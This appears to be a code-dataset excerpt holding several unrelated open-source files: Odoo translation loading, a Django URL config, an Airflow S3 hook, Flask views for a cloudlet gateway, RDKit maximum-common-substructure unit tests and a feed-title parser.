translatable_fields.append({'name': k, 'id': id, 'model': model })
if len(langs):
fields = [f.get('name') for f in translatable_fields]
record = trans_model.read(cr, uid, [id], fields, context={ 'lang': main_lang })[0]
for lg in langs:
for f in translatable_fields:
# Check if record exists, else create it (at once)
sql = """INSERT INTO ir_translation (lang, src, name, type, res_id, value)
SELECT %s, %s, %s, 'model', %s, %s WHERE NOT EXISTS
(SELECT 1 FROM ir_translation WHERE lang=%s AND name=%s AND res_id=%s AND type='model');
UPDATE ir_translation SET src = %s WHERE lang=%s AND name=%s AND res_id=%s AND type='model';
"""
src = record[f['name']] or None
name = "%s,%s" % (f['model'], f['name'])
cr.execute(sql, (lg, src , name, f['id'], src, lg, name, f['id'], src, lg, name, id))
action = {
'name': 'Translate',
'res_model': 'ir.translation',
'type': 'ir.actions.act_window',
'view_type': 'form',
'view_mode': 'tree,form',
'domain': domain,
}
if field:
f = trans_model._fields[field]
action['context'] = {
'search_default_name': "%s,%s" % (f.base_field.model_name, field)
}
return action
def _get_import_cursor(self, cr, uid, context=None):
""" Return a cursor-like object for fast inserting translations
"""
return ir_translation_import_cursor(cr, uid, self, context=context)
def load_module_terms(self, cr, modules, langs, context=None):
context = dict(context or {}) # local copy
for module_name in modules:
modpath = openerp.modules.get_module_path(module_name)
if not modpath:
continue
for lang in langs:
lang_code = tools.get_iso_codes(lang)
base_lang_code = None
if '_' in lang_code:
base_lang_code = lang_code.split('_')[0]
# Step 1: for sub-languages, load base language first (e.g. es_CL.po is loaded over es.po)
if base_lang_code:
base_trans_file = openerp.modules.get_module_resource(module_name, 'i18n', base_lang_code + '.po')
if base_trans_file:
_logger.info('module %s: loading base translation file %s for language %s', module_name, base_lang_code, lang)
tools.trans_load(cr, base_trans_file, lang, verbose=False, module_name=module_name, context=context)
context['overwrite'] = True # make sure the requested translation will override the base terms later
# i18n_extra folder is for additional translations handle manually (eg: for l10n_be)
base_trans_extra_file = openerp.modules.get_module_resource(module_name, 'i18n_extra', base_lang_code + '.po')
if base_trans_extra_file:
_logger.info('module %s: loading extra base translation file %s for language %s', module_name, base_lang_code, lang)
tools.trans_load(cr, base_trans_extra_file, lang, verbose=False, module_name=module_name, context=context)
context['overwrite'] = True # make sure the requested translation will override the base terms later
# Step 2: then load the main translation file, possibly overriding the terms coming from the base language
trans_file = openerp.modules.get_module_resource(module_name, 'i18n', lang_code + '.po')
if trans_file:
_logger.info('module %s: loading translation file (%s) for language %s', module_name, lang_code, lang)
tools.trans_load(cr, trans_file, lang, verbose=False, module_name=module_name, context=context)
elif lang_code != 'en_US':
_logger.warning('module %s: no translation for language %s', module_name, lang_code)
trans_extra_file = openerp.modules.get_module_resource(module_name, 'i18n_extra', lang_code + '.po')
if trans_extra_file:
_logger.info('module %s: loading extra translation file (%s) for language %s', module_name, lang_code, lang)
tools.trans_load(cr, trans_extra_file, lang, verbose=False, module_name=module_name, context=context)
return True
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
cainmatt/django
|
refs/heads/master
|
tests/conditional_processing/urls.py
|
360
|
from django.conf.urls import url
from . import views
urlpatterns = [
url('^condition/$', views.index),
url('^condition/last_modified/$', views.last_modified_view1),
url('^condition/last_modified2/$', views.last_modified_view2),
url('^condition/etag/$', views.etag_view1),
url('^condition/etag2/$', views.etag_view2),
]
|
adrpar/incubator-airflow
|
refs/heads/master
|
airflow/hooks/S3_hook.py
|
21
|
# -*- coding: utf-8 -*-
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import division
from future import standard_library
standard_library.install_aliases()
import logging
import re
import fnmatch
import configparser
import math
import os
from urllib.parse import urlparse
import warnings
import boto
from boto.s3.connection import S3Connection, NoHostProvided
from boto.sts import STSConnection
boto.set_stream_logger('boto')
logging.getLogger("boto").setLevel(logging.INFO)
from airflow.exceptions import AirflowException
from airflow.hooks.base_hook import BaseHook
def _parse_s3_config(config_file_name, config_format='boto', profile=None):
"""
Parses a config file for s3 credentials. Can currently
parse boto, s3cmd.conf and AWS SDK config formats
:param config_file_name: path to the config file
:type config_file_name: str
:param config_format: config type. One of "boto", "s3cmd" or "aws".
Defaults to "boto"
:type config_format: str
:param profile: profile name in AWS type config file
:type profile: str
"""
Config = configparser.ConfigParser()
if Config.read(config_file_name): # pragma: no cover
sections = Config.sections()
else:
raise AirflowException("Couldn't read {0}".format(config_file_name))
# Setting option names depending on file format
if config_format is None:
config_format = 'boto'
conf_format = config_format.lower()
if conf_format == 'boto': # pragma: no cover
if profile is not None and 'profile ' + profile in sections:
cred_section = 'profile ' + profile
else:
cred_section = 'Credentials'
elif conf_format == 'aws' and profile is not None:
cred_section = profile
else:
cred_section = 'default'
# Option names
if conf_format in ('boto', 'aws'): # pragma: no cover
key_id_option = 'aws_access_key_id'
secret_key_option = 'aws_secret_access_key'
# security_token_option = 'aws_security_token'
else:
key_id_option = 'access_key'
secret_key_option = 'secret_key'
# Actual Parsing
if cred_section not in sections:
raise AirflowException("This config file format is not recognized")
else:
try:
access_key = Config.get(cred_section, key_id_option)
secret_key = Config.get(cred_section, secret_key_option)
calling_format = None
if Config.has_option(cred_section, 'calling_format'):
calling_format = Config.get(cred_section, 'calling_format')
except:
logging.warning("Option Error in parsing s3 config file")
raise
return (access_key, secret_key, calling_format)
class S3Hook(BaseHook):
"""
Interact with S3. This class is a wrapper around the boto library.
"""
def __init__(
self,
s3_conn_id='s3_default'):
self.s3_conn_id = s3_conn_id
self.s3_conn = self.get_connection(s3_conn_id)
self.extra_params = self.s3_conn.extra_dejson
self.profile = self.extra_params.get('profile')
self.calling_format = None
self.s3_host = None
self._creds_in_conn = 'aws_secret_access_key' in self.extra_params
self._creds_in_config_file = 's3_config_file' in self.extra_params
self._default_to_boto = False
if 'host' in self.extra_params:
self.s3_host = self.extra_params['host']
if self._creds_in_conn:
self._a_key = self.extra_params['aws_access_key_id']
self._s_key = self.extra_params['aws_secret_access_key']
if 'calling_format' in self.extra_params:
self.calling_format = self.extra_params['calling_format']
elif self._creds_in_config_file:
self.s3_config_file = self.extra_params['s3_config_file']
# The format can be None and will default to boto in the parser
self.s3_config_format = self.extra_params.get('s3_config_format')
else:
self._default_to_boto = True
# STS support for cross account resource access
self._sts_conn_required = ('aws_account_id' in self.extra_params or
'role_arn' in self.extra_params)
if self._sts_conn_required:
self.role_arn = (self.extra_params.get('role_arn') or
"arn:aws:iam::" +
self.extra_params['aws_account_id'] +
":role/" +
self.extra_params['aws_iam_role'])
self.connection = self.get_conn()
def __getstate__(self):
pickled_dict = dict(self.__dict__)
del pickled_dict['connection']
return pickled_dict
def __setstate__(self, d):
self.__dict__.update(d)
self.__dict__['connection'] = self.get_conn()
def _parse_s3_url(self, s3url):
warnings.warn(
'Please note: S3Hook._parse_s3_url() is now '
'S3Hook.parse_s3_url() (no leading underscore).',
DeprecationWarning)
return self.parse_s3_url(s3url)
@staticmethod
def parse_s3_url(s3url):
parsed_url = urlparse(s3url)
if not parsed_url.netloc:
raise AirflowException('Please provide a bucket_name')
else:
bucket_name = parsed_url.netloc
key = parsed_url.path.strip('/')
return (bucket_name, key)
def get_conn(self):
"""
Returns the boto S3Connection object.
"""
if self._default_to_boto:
return S3Connection(profile_name=self.profile)
a_key = s_key = None
if self._creds_in_config_file:
a_key, s_key, calling_format = _parse_s3_config(self.s3_config_file,
self.s3_config_format,
self.profile)
elif self._creds_in_conn:
a_key = self._a_key
s_key = self._s_key
calling_format = self.calling_format
s3_host = self.s3_host
if calling_format is None:
calling_format = 'boto.s3.connection.SubdomainCallingFormat'
if s3_host is None:
s3_host = NoHostProvided
if self._sts_conn_required:
sts_connection = STSConnection(aws_access_key_id=a_key,
aws_secret_access_key=s_key,
profile_name=self.profile)
assumed_role_object = sts_connection.assume_role(
role_arn=self.role_arn,
role_session_name="Airflow_" + self.s3_conn_id
)
creds = assumed_role_object.credentials
connection = S3Connection(
aws_access_key_id=creds.access_key,
aws_secret_access_key=creds.secret_key,
calling_format=calling_format,
security_token=creds.session_token
)
else:
connection = S3Connection(aws_access_key_id=a_key,
aws_secret_access_key=s_key,
calling_format=calling_format,
host=s3_host,
profile_name=self.profile)
return connection
def get_credentials(self):
if self._creds_in_config_file:
a_key, s_key, calling_format = _parse_s3_config(self.s3_config_file,
self.s3_config_format,
self.profile)
elif self._creds_in_conn:
a_key = self._a_key
s_key = self._s_key
return a_key, s_key
def check_for_bucket(self, bucket_name):
"""
Check if bucket_name exists.
:param bucket_name: the name of the bucket
:type bucket_name: str
"""
return self.connection.lookup(bucket_name) is not None
def get_bucket(self, bucket_name):
"""
Returns a boto.s3.bucket.Bucket object
:param bucket_name: the name of the bucket
:type bucket_name: str
"""
return self.connection.get_bucket(bucket_name)
def list_keys(self, bucket_name, prefix='', delimiter=''):
"""
Lists keys in a bucket under prefix and not containing delimiter
:param bucket_name: the name of the bucket
:type bucket_name: str
:param prefix: a key prefix
:type prefix: str
:param delimiter: the delimiter marks key hierarchy.
:type delimiter: str
"""
b = self.get_bucket(bucket_name)
keylist = list(b.list(prefix=prefix, delimiter=delimiter))
return [k.name for k in keylist] if keylist != [] else None
def list_prefixes(self, bucket_name, prefix='', delimiter=''):
"""
Lists prefixes in a bucket under prefix
:param bucket_name: the name of the bucket
:type bucket_name: str
:param prefix: a key prefix
:type prefix: str
:param delimiter: the delimiter marks key hierarchy.
:type delimiter: str
"""
b = self.get_bucket(bucket_name)
plist = b.list(prefix=prefix, delimiter=delimiter)
prefix_names = [p.name for p in plist
if isinstance(p, boto.s3.prefix.Prefix)]
return prefix_names if prefix_names != [] else None
def check_for_key(self, key, bucket_name=None):
"""
Checks that a key exists in a bucket
"""
if not bucket_name:
(bucket_name, key) = self.parse_s3_url(key)
bucket = self.get_bucket(bucket_name)
return bucket.get_key(key) is not None
def get_key(self, key, bucket_name=None):
"""
Returns a boto.s3.key.Key object
:param key: the path to the key
:type key: str
:param bucket_name: the name of the bucket
:type bucket_name: str
"""
if not bucket_name:
(bucket_name, key) = self.parse_s3_url(key)
bucket = self.get_bucket(bucket_name)
return bucket.get_key(key)
def check_for_wildcard_key(self,
wildcard_key, bucket_name=None, delimiter=''):
"""
Checks that a key matching a wildcard expression exists in a bucket
"""
return self.get_wildcard_key(wildcard_key=wildcard_key,
bucket_name=bucket_name,
delimiter=delimiter) is not None
def get_wildcard_key(self, wildcard_key, bucket_name=None, delimiter=''):
"""
Returns a boto.s3.key.Key object matching the regular expression
:param regex_key: the path to the key
:type regex_key: str
:param bucket_name: the name of the bucket
:type bucket_name: str
"""
if not bucket_name:
(bucket_name, wildcard_key) = self.parse_s3_url(wildcard_key)
bucket = self.get_bucket(bucket_name)
prefix = re.split(r'[*]', wildcard_key, 1)[0]
klist = self.list_keys(bucket_name, prefix=prefix, delimiter=delimiter)
if not klist:
return None
key_matches = [k for k in klist if fnmatch.fnmatch(k, wildcard_key)]
return bucket.get_key(key_matches[0]) if key_matches else None
def check_for_prefix(self, bucket_name, prefix, delimiter):
"""
Checks that a prefix exists in a bucket
"""
prefix = prefix + delimiter if prefix[-1] != delimiter else prefix
prefix_split = re.split(r'(\w+[{d}])$'.format(d=delimiter), prefix, 1)
previous_level = prefix_split[0]
plist = self.list_prefixes(bucket_name, previous_level, delimiter)
return False if plist is None else prefix in plist
def load_file(
self,
filename,
key,
bucket_name=None,
replace=False,
multipart_bytes=5 * (1024 ** 3),
encrypt=False):
"""
Loads a local file to S3
:param filename: name of the file to load.
:type filename: str
:param key: S3 key that will point to the file
:type key: str
:param bucket_name: Name of the bucket in which to store the file
:type bucket_name: str
:param replace: A flag to decide whether or not to overwrite the key
if it already exists. If replace is False and the key exists, an
error will be raised.
:type replace: bool
:param multipart_bytes: If provided, the file is uploaded in parts of
this size (minimum 5242880). The default value is 5GB, since S3
cannot accept non-multipart uploads for files larger than 5GB. If
the file is smaller than the specified limit, the option will be
ignored.
:type multipart_bytes: int
:param encrypt: If True, the file will be encrypted on the server-side
by S3 and will be stored in an encrypted form while at rest in S3.
:type encrypt: bool
"""
if not bucket_name:
(bucket_name, key) = self.parse_s3_url(key)
bucket = self.get_bucket(bucket_name)
key_obj = bucket.get_key(key)
if not replace and key_obj:
raise ValueError("The key {key} already exists.".format(
**locals()))
key_size = os.path.getsize(filename)
if multipart_bytes and key_size >= multipart_bytes:
# multipart upload
from filechunkio import FileChunkIO
mp = bucket.initiate_multipart_upload(key_name=key,
encrypt_key=encrypt)
total_chunks = int(math.ceil(key_size / multipart_bytes))
sent_bytes = 0
try:
for chunk in range(total_chunks):
offset = chunk * multipart_bytes
bytes = min(multipart_bytes, key_size - offset)
with FileChunkIO(
filename, 'r', offset=offset, bytes=bytes) as fp:
logging.info('Sending chunk {c} of {tc}...'.format(
c=chunk + 1, tc=total_chunks))
mp.upload_part_from_file(fp, part_num=chunk + 1)
except:
mp.cancel_upload()
raise
mp.complete_upload()
else:
# regular upload
if not key_obj:
key_obj = bucket.new_key(key_name=key)
key_size = key_obj.set_contents_from_filename(filename,
replace=replace,
encrypt_key=encrypt)
logging.info("The key {key} now contains"
" {key_size} bytes".format(**locals()))
def load_string(self, string_data,
key, bucket_name=None,
replace=False,
encrypt=False):
"""
Loads a local file to S3
This is provided as a convenience to drop a file in S3. It uses the
boto infrastructure to ship a file to s3. It is currently using only
a single part download, and should not be used to move large files.
:param string_data: string to set as content for the key.
:type string_data: str
:param key: S3 key that will point to the file
:type key: str
:param bucket_name: Name of the bucket in which to store the file
:type bucket_name: str
:param replace: A flag to decide whether or not to overwrite the key
if it already exists
:type replace: bool
:param encrypt: If True, the file will be encrypted on the server-side
by S3 and will be stored in an encrypted form while at rest in S3.
:type encrypt: bool
"""
if not bucket_name:
(bucket_name, key) = self.parse_s3_url(key)
bucket = self.get_bucket(bucket_name)
key_obj = bucket.get_key(key)
if not replace and key_obj:
raise ValueError("The key {key} already exists.".format(
**locals()))
if not key_obj:
key_obj = bucket.new_key(key_name=key)
key_size = key_obj.set_contents_from_string(string_data,
replace=replace,
encrypt_key=encrypt)
logging.info("The key {key} now contains"
" {key_size} bytes".format(**locals()))
|
OpenEdgeComputing/elijah-openstack
|
refs/heads/master
|
cloudlet-gateway/caas/provider/views.py
|
2
|
# -*- coding: utf-8 -*-
"""app views."""
import os
import pdb
import requests
from flask import Blueprint, render_template, request, flash, url_for, redirect, current_app, send_from_directory, \
Response, abort, stream_with_context
from flask_login import login_required, current_user
import ruamel.yaml
from caas.provider.api import create_application, rm_config_files
from caas.provider.forms import NewAppForm
from caas.provider.models import App as AppModel, Cluster
from caas.utils import flash_errors
blueprint = Blueprint('provider', __name__, url_prefix='/providers', static_folder='../static')
@blueprint.route('/members')
@login_required
def members():
"""show current apps"""
return render_template('providers/members.html')
@blueprint.route('/', methods=["GET", "POST"])
@blueprint.route('/apps', methods=["GET", "POST"])
@login_required
def apps():
"""show current apps"""
# get clusters for current user
clusters = Cluster.query.filter_by(user_id=current_user.id).all()
cluster_choices = [(cluster.name, cluster.name) for cluster in clusters]
form = NewAppForm(cluster_choices)
if request.method == 'POST':
if form.validate_on_submit():
uploaded_file = form.config_file.data
app_name = form.appname.data
user_id = current_user.id
cluster = Cluster.query.filter_by(name=form.clustername.data, user_id=current_user.id).first()
create_application(app_name, user_id, uploaded_file, cluster)
flash('Created a new app', 'success')
redirect_url = request.args.get('next') or url_for('provider.apps')
return redirect(redirect_url)
else:
flash_errors(form)
display_info = {}
for app in current_user.apps:
display_info[app.name] = app.config_file_name[AppModel.APP_TYPE(app.type)]
cluster_monitor_urls = {}
for cluster in clusters:
cluster_monitor_urls[cluster.name] = '{}{}:8080'.format(current_app.config['LELPROXY'],
cluster.leader_public_ip)
return render_template('providers/services.html', apps=display_info, clusters=clusters, form=form,
cluster_monitor_urls=cluster_monitor_urls)
@blueprint.route('/delete/<string:appname>', methods=["GET"])
def delete_apps(appname):
new_apps = AppModel.query.filter_by(name=appname, user_id=current_user.id).all()
if new_apps:
for new_app in new_apps:
current_app.logger.debug("deleting app {}".format(new_app))
rm_config_files(new_app)
new_app.delete()
flash('Deleted application {}'.format(appname), 'success')
redirect_url = request.args.get('next') or url_for('provider.apps')
return redirect(redirect_url)
def read_config_data(app, app_type):
with open(os.path.join(current_app.config['UPLOADED_CONFIG_FILE_DIR'],
app.config_file_name[app_type]), 'r') as f:
config_data = ruamel.yaml.load(f.read(), ruamel.yaml.RoundTripLoader)
return config_data
@blueprint.route('/config_files/<string:appname>', methods=["GET"])
@login_required
def config_files(appname):
app = AppModel.query.filter_by(name=appname).first()
if not app:
abort(404, "{} doesn't exist".format(appname))
app_type = AppModel.APP_TYPE(app.type)
config_data = {}
if app_type != AppModel.APP_TYPE.Mixed:
part_config_data = read_config_data(app, app_type)
config_data[app_type.value] = part_config_data
else: # app_type == AppModel.APP_TYPE.Mixed:
vm_config_data = read_config_data(app, AppModel.APP_TYPE.VMs)
config_data[AppModel.APP_TYPE.VMs.value] = vm_config_data
ct_config_data = read_config_data(app, AppModel.APP_TYPE.Containers)
config_data[AppModel.APP_TYPE.Containers.value] = ct_config_data
return Response(ruamel.yaml.dump(config_data, Dumper=ruamel.yaml.RoundTripDumper), mimetype='text/plain')
|
soerendip42/rdkit
|
refs/heads/master
|
rdkit/Chem/UnitTestMCS.py
|
4
|
import unittest
import time
from rdkit import Chem
from rdkit.Chem import MCS
def load_smiles(text):
mols = []
for line in text.strip().splitlines():
smiles = line.split()[0]
mol = Chem.MolFromSmiles(smiles)
assert mol is not None, smiles
mols.append(mol)
return mols
_ignore = object()
class MCSTestCase(unittest.TestCase):
def assert_search(self, smiles, numAtoms, numBonds, smarts=_ignore, **kwargs):
result = MCS.FindMCS(smiles, **kwargs)
self.assert_result(result, completed=1, numAtoms=numAtoms, numBonds=numBonds,
smarts=smarts)
def assert_result(self, result, completed=_ignore, numAtoms=_ignore,
numBonds=_ignore, smarts=_ignore):
if completed is not _ignore:
self.assertEqual(result.completed, completed)
if numAtoms is not _ignore:
self.assertEqual(result.numAtoms, numAtoms)
if numBonds is not _ignore:
self.assertEqual(result.numBonds, numBonds)
if smarts is not _ignore:
self.assertEqual(result.smarts, smarts)
simple_mols = load_smiles("""
c1ccccc1O phenol
CO methanol""")
class TestMinAtoms(MCSTestCase):
def test_min_atoms_2(self):
self.assert_search(simple_mols, 2, 1, minNumAtoms=2)
def test_min_atoms_3(self):
self.assert_search(simple_mols, -1, -1, smarts=None, minNumAtoms=3)
def test_min_atoms_1(self):
try:
result = MCS.FindMCS(simple_mols, minNumAtoms=1)
except ValueError:
pass
else:
raise AssertionError("should have raised an exception")
maximize_mols = load_smiles("""
C12CCC1CC2OCCCCCCC 2-rings-and-chain-with-O
C12CCC1CC2SCCCCCCC 2-rings-and-chain-with-S
""")
class TextMaximize(MCSTestCase):
# C12CCC1CC2OCCCCCCC 2-rings-and-chain-with-O
# C12CCC1CC2SCCCCCCC 2-rings-and-chain-with-S
def test_maximize_default(self):
# default maximizes the number of bonds
self.assert_search(maximize_mols, 6, 7)
def test_maximize_atoms(self):
self.assert_search(maximize_mols, 7, 6, maximize="atoms")
def test_maximize_bonds(self):
self.assert_search(maximize_mols, 6, 7, maximize="bonds")
atomtype_mols = load_smiles("""
c1ccccc1O phenol
CCCCCCOn1cccc1 different-answers-depending-on-type
""")
class TestAtomTypes(MCSTestCase):
# The tests compare:
# c1ccccc1O
# CCCCCCOn1cccc1
def test_atom_compare_default(self):
self.assert_search(atomtype_mols, 4, 3, smarts='[#6](:[#6]):[#6]:[#6]')
def test_atom_compare_elements(self):
self.assert_search(atomtype_mols, 4, 3, smarts='[#6](:[#6]):[#6]:[#6]', atomCompare="elements")
def test_atom_compare_any(self):
# Note: bond aromaticies must still match!
# 'cccccO' matches 'ccccnO'
self.assert_search(atomtype_mols, 6, 5, atomCompare="any")
def test_atom_compare_any_bond_compare_any(self):
# Linear chain of 7 atoms
self.assert_search(atomtype_mols, 7, 6, atomCompare="any", bondCompare="any")
def test_bond_compare_any(self):
# Linear chain of 7 atoms
self.assert_search(atomtype_mols, 7, 6, bondCompare="any")
isotope_mols = load_smiles("""
C1C[0N]CC[5C]1[1C][2C][2C][3C] C1223
C1CPCC[4C]1[2C][2C][1C][3C] C2213
""")
class TestIsotopes(MCSTestCase):
# C1C[0N]CC[5C]1[1C][2C][2C][3C] C1223
# C1CPCC[4C]1[2C][2C][1C][3C] C2213
def test_without_isotope(self):
# The entire system, except the N/P in the ring
self.assert_search(isotope_mols, numAtoms=9, numBonds=8)
def test_isotopes(self):
# 5 atoms of class '0' in the ring
self.assert_search(isotope_mols, 5, 4, atomCompare="isotopes")
def test_isotope_complete_ring_only(self):
# the 122 in the chain
self.assert_search(isotope_mols, 3, 2, atomCompare="isotopes", completeRingsOnly=True)
bondtype_mols = load_smiles("""
C1CCCCC1OC#CC#CC#CC#CC#CC first
c1ccccc1ONCCCCCCCCCC second
""")
class TestBondTypes(MCSTestCase):
# C1CCCCC1OC#CC#CC#CC#CC#CC
# c1ccccc1ONCCCCCCCCCC second
def test_bond_compare_default(self):
# Match the 'CCCCCC' part of the first ring, with the second's tail
self.assert_search(bondtype_mols, 6, 5)
def test_bond_compare_bondtypes(self):
# Repeat of the previous
self.assert_search(bondtype_mols, 6, 5, bondCompare="bondtypes")
def test_bond_compare_any(self):
# the CC#CC chain matches the CCCC tail
self.assert_search(bondtype_mols, 10, 9, bondCompare="any")
def test_atom_compare_elements_bond_compare_any(self):
self.assert_search(bondtype_mols, 10, 9, atomCompare="elements", bondCompare="any")
def test_atom_compare_any_bond_compare_any(self):
# complete match!
self.assert_search(bondtype_mols, 18, 18, atomCompare="any", bondCompare="any")
valence_mols = load_smiles("""
CCCCCCCCN
CCC[CH-]CCCC
""")
class TestValences(MCSTestCase):
def test_valence_compare_default(self):
# match 'CCCCCCCC'
self.assert_search(valence_mols, 8, 7)
def test_valence_compare_valence(self):
# match 'CCCC'
self.assert_search(valence_mols, 4, 3, matchValences=True)
def test_valence_compare_valence(self):
# match 'CCCCN' to '[CH-]CCCC' (but in reverse)
self.assert_search(valence_mols, 5, 4, matchValences=True, atomCompare="any")
ring_mols = load_smiles("""
C12CCCC(N2)CCCC1 6-and-7-bridge-rings-with-N
C1CCCCN1 6-ring
C1CCCCCN1 7-ring
C1CCCCCCCC1 9-ring
NC1CCCCCC1 N+7-ring
C1CC1CCCCCC 3-ring-with-tail
C12CCCC(O2)CCCC1 6-and-7-bridge-rings-with-O
""")
def SELECT(mols, *offsets):
return [mols[offset-1] for offset in offsets]
class TestRingMatchesRingOnly(MCSTestCase):
# C12CCCC(N2)CCCC1 6-and-7-bridge-rings-with-N
# C1CCCCN1 6-ring
# C1CCCCCN1 7-ring
# C1CCCCCCCC1 9-ring
# NC1CCCCCC1 N+7-ring
# C1CC1CCCCCC 3-ring-with-tail
# C12CCCC(O2)CCCC1 6-and-7-bridge-rings-with-O
def test_default(self):
# Should match 'CCCCC'
self.assert_search(ring_mols, 5, 4)
def test_ring_only(self):
# Should match "CCC"
self.assert_search(ring_mols, 3, 2, ringMatchesRingOnly=True)
def test_ring_only_select_1_2(self):
# Should match "C1CCCCCN1"
self.assert_search(SELECT(ring_mols, 1, 2), 6, 6, ringMatchesRingOnly=True)
def test_ring_only_select_1_3(self):
# Should match "C1CCCCCCN1"
self.assert_search(SELECT(ring_mols, 1, 3), 7, 7, ringMatchesRingOnly=True)
def test_ring_only_select_1_4(self):
# Should match "C1CCCCCCCC1"
self.assert_search(SELECT(ring_mols, 1, 4), 9, 9, ringMatchesRingOnly=True)
def test_select_1_5(self):
# Should match "NCCCCCC"
self.assert_search(SELECT(ring_mols, 1, 5), 8, 7, ringMatchesRingOnly=False)
def test_ring_only_select_1_5(self):
# Should match "CCCCCC"
self.assert_search(SELECT(ring_mols, 1, 5), 7, 6, ringMatchesRingOnly=True)
def test_select_1_6(self):
# Should match "CCCCCCCCC" by breaking one of the 3-carbon ring bonds
self.assert_search(SELECT(ring_mols, 1, 6), 9, 8)
def test_ring_only_select_1_6(self):
# Should match "CCC" from the three atom ring
self.assert_search(SELECT(ring_mols, 1, 6), 3, 2, ringMatchesRingOnly=True)
def test_ring_only_select_1_7(self):
# Should match the outer ring "C1CCCCCCCC1"
self.assert_search(SELECT(ring_mols, 1, 7), 9, 9)
def test_ring_only_select_1_7_any_atoms(self):
# Should match everything
self.assert_search(SELECT(ring_mols, 1, 7), 10, 11, ringMatchesRingOnly=True, atomCompare="any")
class TestCompleteRingsOnly(MCSTestCase):
# C12CCCC(N2)CCCC1 6-and-7-bridge-rings-with-N
# C1CCCCN1 6-ring
# C1CCCCCN1 7-ring
# C1CCCCCCCC1 9-ring
# NC1CCCCCC1 N+7-ring
# C1CC1CCCCCC 3-ring-with-tail
# C12CCCC(O2)CCCC1 6-and-7-bridge-rings-with-O
def test_ring_only(self):
# No match: "CCC" is not in a ring
self.assert_search(ring_mols, -1, -1, completeRingsOnly=True)
def test_ring_only_select_1_2(self):
# Should match "C1CCCCCN1"
self.assert_search(SELECT(ring_mols, 1, 2), 6, 6, completeRingsOnly=True)
def test_ring_only_select_1_3(self):
# Should match "C1CCCCCCN1"
self.assert_search(SELECT(ring_mols, 1, 3), 7, 7, completeRingsOnly=True)
def test_ring_only_select_1_4(self):
# Should match "C1CCCCCCCC1"
self.assert_search(SELECT(ring_mols, 1, 4), 9, 9, completeRingsOnly=True)
def test_ring_only_select_1_5(self):
# No match: "CCCCCC" is not in a ring
self.assert_search(SELECT(ring_mols, 1, 5), -1, -1, completeRingsOnly=True)
def test_ring_only_select_1_7(self):
# Should match the outer ring "C1CCCCCCCC1"
self.assert_search(SELECT(ring_mols, 1, 7), 9, 9, completeRingsOnly=True)
def test_ring_only_select_1_7_any_atoms(self):
# Should match everything
self.assert_search(SELECT(ring_mols, 1, 7), 10, 11, completeRingsOnly=True, atomCompare="any")
def test_ring_to_nonring_bond(self):
# Should allow the cO in phenol to match the CO in the other structure
self.assert_search(atomtype_mols, 2, 1, completeRingsOnly=True)
lengthy_mols = [Chem.MolFromSmiles("Nc1ccccc1"*20),
Chem.MolFromSmiles("Nc1ccccccccc1"*20)]
class TestTimeout(MCSTestCase):
# This should take over two minutes to process. Give it 0.1 seconds.
def test_timeout(self):
t1 = time.time()
result = MCS.FindMCS(lengthy_mols, timeout=0.1)
self.assert_result(result, completed=0)
self.assertTrue(result.numAtoms > 1)
self.assertTrue(result.numBonds >= result.numAtoms-1, (result.numAtoms, result.numBonds))
t2 = time.time()
self.assertTrue(t2-t1 < 0.5, t2-t1)
# Check for non-negative values
def test_timeout_negative(self):
try:
MCS.FindMCS(lengthy_mols, timeout=-1)
except ValueError:
pass
else:
raise AssertionError("bad range check for timeout")
if __name__ == "__main__":
unittest.main()
|
fake-name/ReadableWebProxy
|
refs/heads/master
|
WebMirror/management/rss_parser_funcs/feed_parse_extractGakuseitranslationsCom.py
|
1
|
def extractGakuseitranslationsCom(item):
'''
Parser for 'gakuseitranslations.com'
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol) or "preview" in item['title'].lower():
return None
tagmap = [
('PRC', 'PRC', 'translated'),
('Loiterous', 'Loiterous', 'oel'),
]
for tagname, name, tl_type in tagmap:
if tagname in item['tags']:
return buildReleaseMessageWithType(item, name, vol, chp, frag=frag, postfix=postfix, tl_type=tl_type)
return False
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.